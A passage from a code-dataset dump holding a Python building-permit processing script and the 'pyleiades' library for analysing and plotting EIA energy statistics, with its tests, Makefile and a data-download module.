= df.applymap(lambda x: pd.np.nan if x in NA_VALUES else x)\n # Rename columns and drop those that aren't listed in the rename process\n df.rename(columns=RENAMED_COLUMNS, inplace=True)\n [df.drop(col, 1, inplace=True) for col in df.columns\n if col not in RENAMED_COLUMNS.values()]\n # and drop rows where all values are NaN\n df.dropna(how=\"all\", inplace=True)\n\n # Capitalize addresses\n df[\"address\"] = df[\"address\"].str.upper()\n # Convert description field to str\n df[\"description\"] = df[\"description\"].astype(str)\n # Clean geocodes (convert to str, and remove dashes (-))\n df[\"geocode\"] = df[\"geocode\"].astype(str)\n df[\"geocode\"] = df[\"geocode\"].apply(lambda x: x.replace(\"-\", \"\"))\n\n # Calculate dwellings\n df[\"dwellings\"] = df[\"description\"].apply(calc_units)\n\n # Query out New Construction, in nearby CITIES, that contain DESC_KEYWORDS\n res_const = df[(df[\"permit_type\"] == \"New Construction\") &\n (df[\"city\"].apply(lambda x: x.lower() in CITIES)) &\n (df[\"description\"].str.contains(DESC_KEYWORDS))].copy()\n\n # Standardize date column\n res_const[\"permit_issued_date\"] = pd.to_datetime(\n res_const[\"permit_issued_date\"], infer_datetime_format=True)\n # Order columns and sort by date\n res_const = res_const[ORDERED_COLUMNS].sort(\"permit_issued_date\")\n if out:\n res_const.to_csv(CNTY_OUT.format(year), index=False)\n return res_const\n\n\ndef combine_odyssey(permits1, permits2, output_intermediate=False):\n \"\"\"Used for the 2015 conversion to Odyssey permit system.\"\"\"\n # Process and combine the two 2015 permit sets\n df_one = county_permits(permits1, output_intermediate)\n df_two = county_permits(permits2, output_intermediate)\n full_df = df_one.append(df_two)\n # Standardize date column\n full_df[\"permit_issued_date\"] = pd.to_datetime(\n full_df[\"permit_issued_date\"], infer_datetime_format=True)\n # Order columns and sort by date\n full_df = full_df[ORDERED_COLUMNS].sort(\"permit_issued_date\")\n full_df.to_csv(CNTY_OUT.format(\"2015\"), index=False)\n return\n"
},
{
"alpha_fraction": 0.6007073521614075,
"alphanum_fraction": 0.6062918901443481,
"avg_line_length": 28.844444274902344,
"blob_id": "2148478cd486c78a990384aff984d75112f9b619",
"content_id": "e9bc2c8c77edbef9b9a883b8d6255b8412e0d80d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5372,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 180,
"path": "/bp2.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\npermits.py -- Building Permit Database Script\nAuthor: Garin Wally; April-July 2016\n\n--NEW--\n\"\"\"\n\nimport os\nfrom glob import glob\n\n\nimport defopt\n\nimport aside\nimport dslw\nimport dslw.arcio\n\nimport app\n\n\n# =============================================================================\n# DATA PATHS\n\nparcels = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.Parcels\"\ncondos = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.All_Condos\"\nannex = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.Annexations\"\nnhoods = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.NH_Council_Boundaries\"\nufda = r\"I:\\ArcExplorer\\Data\\Planning_to_sde.gdb\\Mt_St_Plane\\UFDA_regions\"\naddrs = r\"I:\\ArcExplorer\\Data\\Structures\\Address.gdb\\AddrsFt\"\n\n\n# =============================================================================\n# DATA (No touching)\n\n# Path to database for storing copies from SDE, etc.\nSDE_DATA = \"data/sde_data.sqlite\"\n\n# Global srid to reproject to; QGIS-friendly\nSRID = 2256\ndata = [\n {\"path\": parcels, \"name\": \"parcels\"},\n {\"path\": condos, \"name\": \"condos\"}, # TODO: dissolve?\n {\"path\": annex, \"name\": \"annexations\"},\n {\"path\": nhoods, \"name\": \"nhoods\"},\n {\"path\": ufda, \"name\": \"ufda_regions\"},\n {\"path\": addrs, \"name\": \"addrs\"}\n ]\n# Names correlate with table names in .sql scripts\n\n'''\[email protected]_process\ndef check_null_geometry(null_geom):\n \"\"\"Msg:\n Check for Null Geometries\n \"\"\"\n if null_geom:\n raise AttributeError(\"Null geometries found\")\n'''\n\n\ndef update_base():\n \"\"\"Updates the sde_data.sqlite database from various data.\n\n ::\n\n $python permits2.py update_base --replace True\n None\n\n Keyword Arguments:\n replace (bool): option to delete and recreate the existing db.\n \"\"\"\n #if replace:\n aside.nix.write(\"Replacing database...\")\n os.remove(SDE_DATA)\n aside.nix.ok()\n conn = dslw.SpatialDB(SDE_DATA, verbose=False)\n print(\"Getting data...\")\n print(\"This will take a long time!\")\n for fc in data:\n if fc[\"name\"] not in conn.get_tables():\n aside.nix.write(fc[\"name\"])\n dslw.arcio.arc2lite(conn, fc[\"path\"], fc[\"name\"], t_srid=SRID)\n aside.nix.ok()\n conn.close()\n print(\"Done\")\n return\n\n\ndef process_city(year):\n \"\"\"Get report by year, process, load into SQLite db.\n\n Args:\n year (int): the year to process.\n \"\"\"\n # Set base directory\n base_dir = \"data/{year}\".format(year=year)\n # Get report file path\n city_rpts = [os.path.abspath(f).replace(\"\\\\\", \"/\") for f in\n glob(\"{base}/city_{year}.xlsx\".format(\n base=base_dir, year=year))]\n #rpt_name = os.path.basename(city_rpts[0]).split(\".\")[0]\n # Process; returns output path\n aside.nix.write(\"Process XLSX\")\n out_csv = app.processing.city(city_rpts[0])\n aside.nix.ok()\n # Get name (e.g. 'city_2016_processed')\n table_name = os.path.basename(out_csv).split(\".\")[0]\n aside.nix.info(\"Table: \" + table_name)\n # Set db path\n db = os.path.join(base_dir, \"bp{year}.sqlite\".format(year=year))\n # Create db\n aside.nix.write(\"Create db\")\n conn = dslw.SpatialDB(db, verbose=False)\n cur = conn.cursor()\n aside.nix.ok()\n # Load csv to db\n aside.nix.write(\"Insert CSV\")\n dslw.csv2lite(conn, out_csv)\n aside.nix.ok()\n # Add notes column\n aside.nix.write(\"Spatialize permits\")\n cur.execute(\"ALTER TABLE {} ADD COLUMN notes TEXT\".format(table_name))\n # Backup\n cur.execute(\"SELECT CloneTable('main', '{0}', '{0}_bk', 1)\".format(\n table_name))\n # Attach spatial db\n cur.execute(\"ATTACH DATABASE '{}' AS sde_data;\".format(\n SDE_DATA))\n # Spatialize\n app.spatialize_script(conn, table_name, SRID)\n cur.execute(\"SELECT address FROM {0} WHERE geometry IS NULL\".format(\n table_name))\n null_geom_df = dslw.utils.Fetch(cur).as_dataframe()\n aside.nix.ok()\n if len(null_geom_df) > 0:\n print(\"\")\n aside.nix.warn(\"Null Geometries Found!\")\n print(null_geom_df)\n print(\"\")\n #check_null_geometry(null_geom)\n\n # Density\n aside.nix.write(\"Calculate 'density<year>' table\")\n with open(\"app/density.sql\", \"r\") as script:\n density_sql = script.read()\n density = density_sql.format(tbl=table_name, year=year, srid=SRID)\n cur.execute(density).fetchall()\n aside.nix.ok()\n\n # Summarize\n aside.nix.write(\"Create 'summary' table\")\n with open(\"app/summarize.sql\", \"r\") as script:\n summarize_sql = script.read()\n summarize = summarize_sql.format(tbl=table_name, juris=\"City\")\n cur.execute(summarize).fetchall()\n aside.nix.ok()\n\n print(\"\")\n check_sum = (\"SELECT jurisdiction, tot_dwellings, sd, dup_units, md_units \"\n \"FROM summary\")\n df = dslw.utils.Fetch(cur.execute(check_sum)).as_dataframe()\n print(df)\n print(\"\")\n total = sum([df[\"sd\"].ix[0], df[\"dup_units\"].ix[0], df[\"md_units\"].ix[0]])\n if df[\"tot_dwellings\"].ix[0] != total:\n aside.nix.warn(\"Total does not match\")\n aside.status.custom(\"COMPLETE\", \"cyan\")\n return\n\n\ndef export_shp():\n pass\n\n\nif __name__ == \"__main__\":\n defopt.run(update_base, process_city)\n"
}
] | 7 |
mnegus01/enviro
|
https://github.com/mnegus01/enviro
|
47a3731ae66cd87ef7146bf87029fe047fbd3dbb
|
04ee829213409d1ff427ffb964588ad19e6feeea
|
55b8f0fc481a19f540979635b5f914d2d2e01e23
|
refs/heads/master
| 2020-12-02T19:21:21.736267 | 2019-04-08T06:12:55 | 2019-04-08T06:12:55 | 96,327,758 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7199124693870544,
"alphanum_fraction": 0.7231947779655457,
"avg_line_length": 30.517240524291992,
"blob_id": "89ba783654e595d789e425ff5ab04fe17d51f73f",
"content_id": "4d2bcfd363899ae02967ee9cae5480aa554d8444",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 914,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 29,
"path": "/tests/conftest.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pytest\nimport pyleiades\nfrom pyleiades.utils.load_data import load_dataset\n\nTEST_DATA_DIR = 'tests/test_data'\nTEST_ARCHIVE_DIR = f'{TEST_DATA_DIR}/test_archive'\n\[email protected](scope=\"session\")\ndef monkeysession():\n # This is required to use monkeypatch in the `module` scope\n #\n # NOTE: It relies on pytest's internal API and so therefore it may not be\n # supported in future releases\n #\n # See https://github.com/pytest-dev/pytest/issues/363 for more info\n from _pytest.monkeypatch import MonkeyPatch\n mpatch = MonkeyPatch()\n yield mpatch\n mpatch.undo()\n\[email protected](scope=\"session\")\ndef testdata(monkeysession):\n monkeysession.setattr(pyleiades, 'DATA_DIR', TEST_DATA_DIR)\n monkeysession.setattr(pyleiades, 'ARCHIVE_DIR', TEST_ARCHIVE_DIR)\n return load_dataset()\n\[email protected](scope=\"module\")\ndef testvals(testdata):\n return testdata.value.values\n"
},
{
"alpha_fraction": 0.6341829299926758,
"alphanum_fraction": 0.6746626496315002,
"avg_line_length": 29.31818199157715,
"blob_id": "bc3c9f6c7701c26ddc3161fd6cb861d280b1ab47",
"content_id": "fd3d54bf935c222a7ede5cdbf5ae54cf846d6c98",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 667,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 22,
"path": "/scripts/pyleiades-demo.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport pyleiades as eia\nimport os\nfrom matplotlib import pyplot as plt\n\n# Create a visual\nvisual = eia.Visual(['coal', 'nuclear'])\nvisual.include_energy('renewable')\n\n# Demo single visual\nvisual.linegraph(freq='yearly', start_date='1970')\nfig_path = os.path.join(os.path.dirname(eia.__file__), 'fig', 'demo-plot.png')\nplt.savefig(fig_path, dpi=300)\nplt.close()\n\n# Demo double visual\nfig, axs = plt.subplots(2, 1, figsize=(8, 6))\naxs[0] = visual.linegraph(ax=axs[0], freq='yearly', start_date='1970')\naxs[1] = visual.linegraph(ax=axs[1], freq='monthly',\n start_date='1980', end_date='2000')\nplt.tight_layout()\nplt.show()\n"
},
{
"alpha_fraction": 0.5836530923843384,
"alphanum_fraction": 0.5859555006027222,
"avg_line_length": 38.48484802246094,
"blob_id": "906150f484a1c6fa9dbff7df79bce60246957df5",
"content_id": "38a15b82087da1e62c53393914fb3f2012ebe731",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5292,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 132,
"path": "/pyleiades/visuals.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nfrom pyleiades.energies import Energy\nfrom pyleiades.utils import inspection\n\nsns.set()\n\nclass Visual:\n \"\"\"\n Create visuals based on energy data.\n\n Takes one or more energy histories as input upon initialization, providing\n methods to visualize the data (including the ability to make comparisons\n across energy sources if more than one energy is given. Visualizations\n include histograms, line graphs, pie charts, and animations.\n\n Attributes\n ––––––––––\n data : DataFrame, optional\n The EIA dataset on which visualizations are based.\n stat_type : str\n The type of statistic ('production', 'consumption', 'import' or\n 'export').\n data_date : str\n The date identifier of the dataset. (The default value is `None`, which\n automatically uses the most recently downloaded dataset.)\n energies : list of Energy object\n A list of energies from the dataset to be visualized.\n\n Parameters\n ––––––––––\n energy_types : str or list of str, optional\n A list of one or more energies to be displayed.\n data : DataFrame, optional\n The EIA dataset to be used. Must be three columns: date, energy\n quantity, and energy code. If omitted, use the default dataset.\n stat_type : str\n The type of statistic to be displayed ('production', 'consumption',\n 'import', or 'export').\n data_date : str\n The date identifier of the dataset. (The default value is `None`, which\n automatically uses the most recently downloaded dataset.)\n \"\"\"\n\n def __init__(self, energy_types=None, data=None, stat_type='consumption',\n data_date=None):\n self.data = data\n self.stat_type = stat_type\n self.data_date = data_date\n self.energies = []\n if energy_types is not None:\n if type(energy_types) is str:\n self.include_energy(energy_types)\n elif type(energy_types) is list:\n self.include_energy(*energy_types)\n else:\n raise ValueError(\"The input energy type(s) must be a single \"\n \"string or a list.\")\n\n self._empty_errmsg = (\"No energy histories have been chosen yet for \"\n \"the visual.\")\n self._freq_errmsg = (\"Frequency '{}' is not compatible with this \"\n \"visual; see documentation for permissible \"\n \"frequency values.\")\n\n def include_energy(self, *energy_types):\n \"\"\"\n Include energy source(s) in the visual.\n\n Parameters\n ––––––––––\n energy_types : str\n The type(s) of energy source to be pulled from the dataset.\n \"\"\"\n for energy_type in energy_types:\n energy = Energy(energy_type, data=self.data,\n stat_type=self.stat_type, data_date=self.data_date)\n self.energies.append(energy)\n\n def linegraph(self, ax=None, freq='yearly', start_date=None,\n end_date=None,):\n \"\"\"\n Make a line graph of the chosen energy source histories.\n\n Parameters\n ––––––––––\n freq : str\n The frequency for plotting data points ('monthly' or 'yearly').\n start_date, end_date : str\n The user specified starting and ending dates for the dataset\n (both inclusive); for 'monthly', acceptable formats are 'YYYYMM',\n 'YYYY-MM', or 'MM-YYYY' (dashes can be substituted for periods,\n underscores, or forward slashes); for 'yearly' or 'cumulative',\n give only the full year, 'YYYY'.\n ax : Axes object, optional\n A set of axes on which to draw the visual. (If not provided, a new\n set of axes are created.)\n \"\"\"\n # Input checks\n if len(self.energies) == 0:\n raise RuntimeError(self._empty_errmsg)\n if freq not in ('monthly', 'yearly'):\n raise ValueError(self._freq_errmsg.format(freq))\n\n # Get data for the selected subject and merge into one dataframe\n totals = pd.DataFrame()\n for energy in self.energies:\n energy_totals = energy.totals(freq, start_date, end_date)\n energy_totals.rename(index=str,\n columns={'value': energy.energy_type},\n inplace=True)\n totals = pd.concat([totals, energy_totals], axis=1)\n dates = totals.index\n\n # Generate the plot\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,6))\n for column in totals.columns:\n npoints = len(totals)\n ax.plot(range(npoints), totals[column], label=column)\n ax.legend()\n ax.set_title(f'Energy {self.stat_type} ({freq})')\n ax.set_ylabel('Energy [QBTU]')\n ax.set_xlim(0, npoints)\n if freq == 'yearly':\n interval = 10\n elif freq == 'monthly':\n interval = 120\n ax.set_xticks(range(0, len(dates), interval))\n ax.set_xticklabels(dates[::interval])\n return ax\n"
},
{
"alpha_fraction": 0.6049774885177612,
"alphanum_fraction": 0.6054187417030334,
"avg_line_length": 38.89436721801758,
"blob_id": "d2bc3e07fa9a9b52411efcc8f1d60a71bf363c25",
"content_id": "752e7d93bf9246e8814e20cf886c5bc72ef2c0e1",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11563,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 284,
"path": "/pyleiades/energies.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom .utils.load_data import load_dataset\nfrom .utils.code_conversion import parse_input_date, EIA_CODES\nfrom .utils.inspection import get_period_freqstr\n\nEIA_ENERGIES = list(EIA_CODES.values())\n\nclass Energy:\n \"\"\"\n Collect energy data for a user-defined energy source.\n\n Retrieves data from the specified energy source according to specific\n attributes, such as energy consumed per decade, per year, or all years in\n which more than a certain amount of energy was consumed from that source.\n Use this class to extract and return pure data from the dataset.\n\n Attributes\n ––––––––––\n energy_type : str\n The type of energy source.\n stat_type : str\n The type of statistic ('production', 'consumption', 'import' or\n 'export').\n energy_data : DataFrame\n The complete set of energy data from the EIA MER.\n monthly_data : DataFrame\n All monthly data values from the EIA MER.\n yearly_data : DataFrame\n All yearly data values from the EIA MER.\n\n Parameters\n ––––––––––\n energy_type : str\n The type of energy source to be pulled from the dataset.\n data : DataFrame, optional\n The EIA dataset to be used. Must be three columns: date, energy\n quantity, and energy code. If omitted, use the default dataset.\n stat_type : str\n The type of statistic to be collected ('production', 'consumption',\n 'import', or 'export').\n data_date: str\n The date identifier of the dataset. (The default value is `None`, which\n automatically uses the most recently downloaded dataset.)\n \"\"\"\n\n def __init__(self, energy_type, data=None,\n stat_type='consumption', data_date=None):\n if energy_type.lower() not in EIA_ENERGIES:\n raise ValueError(f\"Energy '{energy_type}' was not found in the EIA \"\n f\"dataset. Available energies are: {EIA_ENERGIES}\")\n self.energy_type = energy_type.lower()\n self.stat_type = stat_type\n\n # Use default dataset if dataset argument is omitted\n if data is None:\n data = load_dataset(dataset_date=data_date, dataset_type=stat_type)\n\n # Isolate this energy's data, separate frequencies, and format the data\n self.energy_data = self._isolate_energy(data)\n self.monthly_data, self.yearly_data = self._sep_freqs(self.energy_data)\n\n self._freq_errmsg = ('Frequency \"{}\" is not compatible with this data; '\n 'see documentation for permissible frequencies.')\n self._extr_errmsg = ('Input \"{}\" is not recognized as an extrema; '\n 'try \"max\" or \"min\"')\n\n def _isolate_energy(self, data):\n \"\"\"\n Isolate one type of energy in the given dataset.\n\n Parameters\n ––––––––––\n data : DataFrame\n The dataset containing all energy values across energy sources.\n\n Returns\n –––––––\n energy_data : DataFrame\n A trimmed version of the original dataset, now with only the\n selected energy source. The energy code column is removed.\n \"\"\"\n energy_data = data[data.energy_type == self.energy_type]\n return energy_data[['date', 'value']]\n\n @staticmethod\n def _sep_freqs(data):\n \"\"\"\n Separate the data into monthly and yearly intervals.\n\n Parameters\n ––––––––––\n data : DataFrame\n The dataset to be partitioned into monthly and yearly intervals.\n\n Returns\n –––––––\n monthly_data : DataFrame\n A subset of the data with the energy values reported monthly.\n yearly_data : DataFrame\n A subset of the data with the energy values reported yearly.\n \"\"\"\n # Separate monthly and yearly totals\n monthly_data = data[data.date.map(get_period_freqstr) == 'M'].copy()\n yearly_data = data[data.date.map(get_period_freqstr) == 'A-DEC'].copy()\n # Index the dataframes by the date\n for df in monthly_data, yearly_data:\n df.set_index('date', inplace=True);\n # Remove date code '13' from end of yearly dates\n return monthly_data, yearly_data\n\n @staticmethod\n def _daterange(data, start_date, end_date):\n \"\"\"\n Resize the dataset to cover only the date range specified.\n\n Parameters\n ––––––––––\n data : DataFrame\n A dataframe containing the data to be resized. The index must be\n in the format of the EIA date code ('YYYYMM').\n start_date, end_date : str\n The dataset start/end dates (both inclusive) as strings ('YYYYMM').\n\n Returns\n –––––––\n bound_data : DataFrame\n A dataframe corresponding to the specified date range.\n \"\"\"\n # Use dataset default dates unless otherwise specified by the user\n if start_date is None:\n start_date = data.index.min()\n else:\n start_date = parse_input_date(start_date)\n if end_date is None:\n end_date = data.index.max()\n else:\n end_date = parse_input_date(end_date)\n\n # Ensure that frequencies match\n data_freq = data.index.freqstr\n start_date = start_date.asfreq(data_freq, how='START')\n end_date = end_date.asfreq(data_freq, how='END')\n # Adjust dataset boundaries \n half_bounded_data = data[data.index >= start_date]\n bounded_data = half_bounded_data[half_bounded_data.index <= end_date]\n return bounded_data\n\n def totals(self, freq='yearly', start_date=None, end_date=None, ):\n \"\"\"\n Get the energy statistic totals over a given period.\n\n This method aggregates energy statistic totals according to a user\n defined frequency—either monthly, yearly, or cumulatively. Data is\n collected for the entire dataset unless specific dates are given.\n When dates are provided, the totals are only returned on that time\n interval, with inclusive starting and ending dates. If data at the\n specified frequency does not exist for the entire interval, the interval\n will be automatically adjusted to fit the available data in the\n interval. Cumulative totals use yearly data, and so only include data up\n until the last complete year.\n\n Parameters\n ––––––––––\n freq : str\n The frequency for gathering totals ('monthly','yearly',or\n 'cumulative').\n start_date, end_date : str\n The user specified starting and ending dates for the dataset\n (both inclusive); for 'monthly', acceptable formats are 'YYYYMM',\n 'YYYY-MM', or 'MM-YYYY' (dashes can be substituted for periods,\n underscores, or forward slashes); for 'yearly' or 'cumulative',\n give only the full year, 'YYYY'.\n\n Returns\n –––––––\n totals_data : DataFrame, float\n A dataframe containing totals in the specified interval at the\n given frequency, a floating point number if a cumulative sum.\n \"\"\"\n # Bound data at requested frequency by start and end dates\n if freq == 'monthly':\n full_data = self.monthly_data\n elif freq == 'yearly' or freq == 'cumulative':\n full_data = self.yearly_data\n else:\n raise ValueError(self._freq_errmsg.format(freq))\n totals_data = self._daterange(full_data, start_date, end_date)\n # For cumulative totals, take the sum\n if freq == 'cumulative':\n totals_data = totals_data.value.sum()\n return totals_data\n\n def maxima(self, freq='yearly', start_date=None, end_date=None):\n \"\"\"\n Get the maximum energy consumed over a given period (see extrema).\n \"\"\"\n maxima = self.extrema('max', freq=freq, start_date=start_date,\n end_date=end_date)\n return maxima\n\n def minima(self, freq='yearly', start_date=None, end_date=None):\n \"\"\"\n Get the minimum energy consumed over a given period (see extrema).\n \"\"\"\n minima = self.extrema('min', freq=freq, start_date=start_date,\n end_date=end_date)\n return minima\n\n def extrema(self, extremum, freq='yearly', start_date=None, end_date=None):\n \"\"\"\n Get the maximum/minimum energy consumed over a given period.\n\n Parameters\n ––––––––––\n extremum : str\n The exteme value to be found ('max' or 'min').\n freq : str\n The frequency for checking extrema ('monthly' or 'yearly').\n start_date, end_date : str\n The user specified starting and ending dates for the dataset\n (both inclusive); for 'monthly', acceptable formats are 'YYYYMM',\n 'YYYY-MM', or 'MM-YYYY' (dashes can be substituted for periods,\n underscores, or forward slashes); for 'yearly' or 'cumulative',\n give only the full year, 'YYYY'.\n\n Returns\n –––––––\n extrema_date : string\n A string representation of the month in which the extreme value\n occurred (format 'YYYY' or 'YYYYMM')\n extreme_value : float\n A dataframe giving the specified extreme value and the date of\n occurrence for that value.\n \"\"\"\n # Bound data by start and end dates\n if freq == 'monthly':\n full_data = self.monthly_data\n elif freq == 'yearly':\n full_data = self.yearly_data\n else:\n raise ValueError(self._freq_errmsg.format(freq))\n extremum_data = self._daterange(full_data, start_date, end_date)\n\n # Select max or min\n extremum = extremum.lower()[:3]\n if extremum == 'max':\n extremum_val = extremum_data.value.max()\n elif extremum == 'min':\n extremum_val = extremum_data.value.min()\n else:\n raise ValueError(self._extr_errmsg.format(extremum))\n extremum_data = extremum_data[extremum_data.value == extremum_val]\n extremum_date = extremum_data.index[0]\n extreme_value = extremum_data.value[0]\n return extremum_date, extreme_value\n\n def more_than(self, amount, start_date, end_date, interval):\n \"\"\"\n Get data for intervals with more energy consumption than a given level.\n\n Parameters\n ––––––––––\n amount: float\n The lower boundary (exclusive) for which data may be included in\n the dataset.\n start_date, end_date : str\n The user specified dataset starting and ending dates (both\n inclusive); acceptable formats are 'YYYYMM', 'YYYY-MM', or\n 'MM-YYYY'. Dashes (\"-\") can be substituted for periods (\".\"),\n underscores (\"_\"), or forward slashes (\"/\").\n interval : str\n The time intervals considered for extrema comparison ('yearly',or\n 'monthly').\n \"\"\"\n raise NotImplementedError\n\n\n\n \"\"\"\n Additonal potential options to add:\n - average yearly energy consumed\n - average seasonal energy consumed\n - consolidate date range selection and monthly/yearly/cumulative selection into a _formatdata method\n \"\"\"\n\n"
},
{
"alpha_fraction": 0.7609223127365112,
"alphanum_fraction": 0.7609223127365112,
"avg_line_length": 31.920000076293945,
"blob_id": "72debc6173c47df9f6e73cd472cc037d7e03cb50",
"content_id": "923f7970615cebffaa908cce0cdc8ddf56984304",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 824,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 25,
"path": "/pyleiades/__init__.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Licensed under the FreeBSD license\n\n\"\"\"\npyleiades: Python Library for EIA Data Examination & Exhibition\n\nTools to use with the EIA Monthly Energy Review datasets. This package provides\nan API for performing more sophisticated examination and visualization of the\nEnergy Information Administration (EIA) Monthly Energy Review (MER) datasets.\n\nData can be accessed directly at the EIA website:\n https://www.eia.gov/totalenergy/data/browser/\n\"\"\"\n\nimport os\nfrom pyleiades.energies import Energy\nfrom pyleiades.visuals import Visual\n\npackage_dir = os.path.dirname(__file__)\n\n# Read the contents of the _version file\nwith open(os.path.join(package_dir, '_version')) as version_file:\n __version__ = version_file.read().strip()\n\nDATA_DIR = os.path.join(package_dir, 'data')\nARCHIVE_DIR = os.path.join(DATA_DIR, 'archive')\n\n"
},
{
"alpha_fraction": 0.6961326003074646,
"alphanum_fraction": 0.6961326003074646,
"avg_line_length": 18.39285659790039,
"blob_id": "0db5fd128f3e12ee96c92848a4271eb565280c4d",
"content_id": "4af1eb93816512cf2f27ae69089c13f909b105b7",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 543,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 28,
"path": "/Makefile",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Include variables\ninclude config.mk\n\n## dist\t\t: Prepare the package for distribution\n.PHONY : dist\ndist :\n\t$(RM) dist/*\n\tpython setup.py sdist bdist_wheel\n\ttwine upload dist/*\n\n## develop \t: Install the package in development mode\n.PHONY : develop \ndevelop :\n\tpython setup.py develop\n\n## install\t: Install the package\n.PHONY : install\ninstall :\n\tpython setup.py install\n\n## test\t\t: Run tests\n.PHONY : test\ntest :\n\tpytest --cov=pyleiades --cov-config=$(COVERAGE_CONFIG) --cov-report html\n\n.PHONY : help\nhelp : Makefile\n\t@sed -n 's/^##//p' $<\n"
},
{
"alpha_fraction": 0.5416666865348816,
"alphanum_fraction": 0.5416666865348816,
"avg_line_length": 79,
"blob_id": "4cb5814ae424d55a3fa8012709d5760905b81af6",
"content_id": "5b0efa207045bb6cd9a04ec13cf89b6e28123fed",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 3,
"path": "/tests/__init__.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "# Note that tests should be run from test parent directory (package top)\nimport os, sys \nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n"
},
{
"alpha_fraction": 0.6560565829277039,
"alphanum_fraction": 0.6611405611038208,
"avg_line_length": 37.33898162841797,
"blob_id": "19185c06011a3c522b298bf34ccdb6e0a8fd6a59",
"content_id": "007c5b013be45121808f74bbc1bfe6109d265469",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4562,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 118,
"path": "/pyleiades/update.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"\nUpdate the pyleiades app data from the EIA website.\n\nAll EIA Monthly Energy Review (MER) data can be found on the EIA website,\nspecifically at 'https://www.eia.gov/totalenergy/data/browser/'. This module\ndownloads that data and stores it in the project's data directory for access by\nthe main pyleiades package.\n\nFunctions\n–––––––––\nmain :\n Execute the update process.\nmove_current_data_to_archive :\n Move the existing current data to archival storage.\nget_current_data_publication_date :\n Get the publication date for the current data (to use when labeling the\n data in the archive).\ngenerate_filename :\n Generate a filename for a table, given its type and format.\ndownload_eia_data_table :\n Download a data table by type and format from the EIA website.\n\"\"\"\nimport os\nimport datetime\nimport urllib.request\nimport pandas as pd\nfrom pyleiades import DATA_DIR, ARCHIVE_DIR\n\n# Define links to the EIA Monthly Energy Review tables\nBASE_URL = 'https://www.eia.gov/totalenergy/data/browser'\nMER_TABLES = {'overview': 'T01.01',\n 'production': 'T01.02',\n 'consumption': 'T01.03',\n 'imports': 'T01.04A',\n 'exports': 'T01.04B'}\nOVERVIEW_TABLE = os.path.join(DATA_DIR, 'EIA_MER_overview')\nTABLE_FORMATS = {'csv': 'csv',\n 'xls': 'xlsx'}\n\ndef generate_filename(table_type, table_format):\n \"\"\"Generate the table's filename given its type and file format.\"\"\"\n ext = TABLE_FORMATS[table_format]\n return f'EIA_MER_{table_type}.{ext}'\n\ndef get_data_publication_date():\n \"\"\"Get the date of the current EIA MER.\"\"\"\n data = pd.read_excel(f'{OVERVIEW_TABLE}.xlsx')\n column = data['U.S. Energy Information Administration'].dropna()\n date_cell = column[column.astype(str).str.contains('Release Date')].iloc[0]\n date_string = date_cell.split(':')[1].strip()\n date = datetime.datetime.strptime(date_string, '%B %d, %Y').date()\n return date\n\ndef include_data_in_archive():\n \"\"\"\n Include the downloaded EIA data in the archive.\n\n Add a folder with the downloaded EIA dataset to the archive location (files\n are all less than one megabyte, so storing them for the conceivable future\n is not problematic.)\n \"\"\"\n # The file exists, get the date and format it properly\n date = str(get_data_publication_date()).replace('-', '')\n new_archive_dir = os.path.join(ARCHIVE_DIR, f'EIA_MER_{date}')\n try:\n os.makedirs(new_archive_dir)\n except OSError:\n # Give the user a chance to avoid files being overwritten\n answer = input( \"It seems as though you already have the most recent \"\n f\"dataset archived already ({new_archive_dir}). Would \"\n \"you like to overwrite that information? [y/n] \")\n if answer[0].lower() != 'y':\n return\n # Move the files to the archive\n for table_title in 